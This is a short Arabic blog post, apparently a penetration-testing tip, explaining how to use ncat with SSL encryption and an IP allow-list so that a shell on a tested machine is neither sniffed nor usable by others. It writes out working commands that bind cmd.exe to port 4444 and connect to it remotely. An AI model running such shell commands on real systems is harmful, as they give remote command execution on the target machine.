أنشاء اتصال عكسي مشفر ومحدد الصلاحيات

في العاده عند الحاجه لإنشاء اتصال عكسي في اختبار الاختراق يتم ذلك عن طريق اداة nc ولكن هناك بعض العيوب في هذه الأداة

  • الاتصال غير مشفر ويمكن التنصت على البيانات المارة في الشبكة
  • لا يمكن تحديد صلاحيات من يستطيع الاتصال بالشيل ، في حاله كان هناك شيل عكسي اي شخص يمكن استغلاله غير مختبر الاختراق

لحل هذه المشكله يتم استخدام اداة ncat وهي نسخه مطوره من nc ويمكن ان يتم استخدامها في وضع ssl وهو وضع مشفر كذلك يمكن تحديد الاجهزه التي يمكن الاتصال بالاداه

للتنصت  استخدام الامر

ncat -lvp 4444 -e cmd.exe –ssl –allow 192.168.1.100

للاتصال بالجهاز استخدم الامر

nc 192.168.1.150 4444 –ssl

يجب استخدام ssl في الجهازين وهو وضع الاتصال المشفر، خيار allow يمكنك من تحديد من له الصلاحيه بالاتصال بالبورت 4444

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني.